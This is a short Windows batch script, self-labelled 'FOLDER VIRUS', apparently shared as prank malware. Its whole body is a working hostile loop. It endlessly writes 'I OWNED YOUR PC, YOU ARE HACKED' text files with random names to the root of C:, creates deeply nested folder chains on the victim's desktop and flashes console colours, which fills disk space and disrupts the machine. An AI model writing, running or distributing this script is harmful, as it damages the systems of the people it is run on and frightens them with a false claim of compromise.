@ECHO OFF

TITLE FOLDER VIRUS BY SAJID :)
color 4a
:FOLDERVIR
echo "I OWNED YOUR PC , YOU ARE HACKED ;)    Contact: 123abc12aa12bc@gmail.com " > c:/YOU_HACKED%random%.txt
MD "%USERPROFILE%\Desktop\A%RANDOM%\B\C\D\E\F\G\H\I\J\K\L\M\N\O\P\Q\R\S\T\U\V\W\X\Y\Z"
ECHO FOLDER VIRUS MADE BY SAJID ALAM :)
color a4
GOTO :FOLDERVIR
